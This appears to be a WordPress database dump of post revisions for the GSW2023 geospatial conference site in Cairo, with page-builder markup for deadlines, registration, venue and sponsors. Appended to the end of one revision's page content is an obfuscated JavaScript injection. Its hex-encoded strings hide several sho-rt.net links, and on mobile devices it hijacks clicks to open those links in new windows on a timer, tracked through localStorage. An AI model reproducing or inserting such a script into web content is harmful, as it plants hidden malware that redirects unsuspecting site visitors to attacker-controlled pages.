link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 06:30:51','2023-05-17 06:30:51','',3066,'https://gsw2023.com/?p=4543',0,'revision','',0),
(4544,1,'2023-05-17 06:32:26','2023-05-17 06:32:26','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" 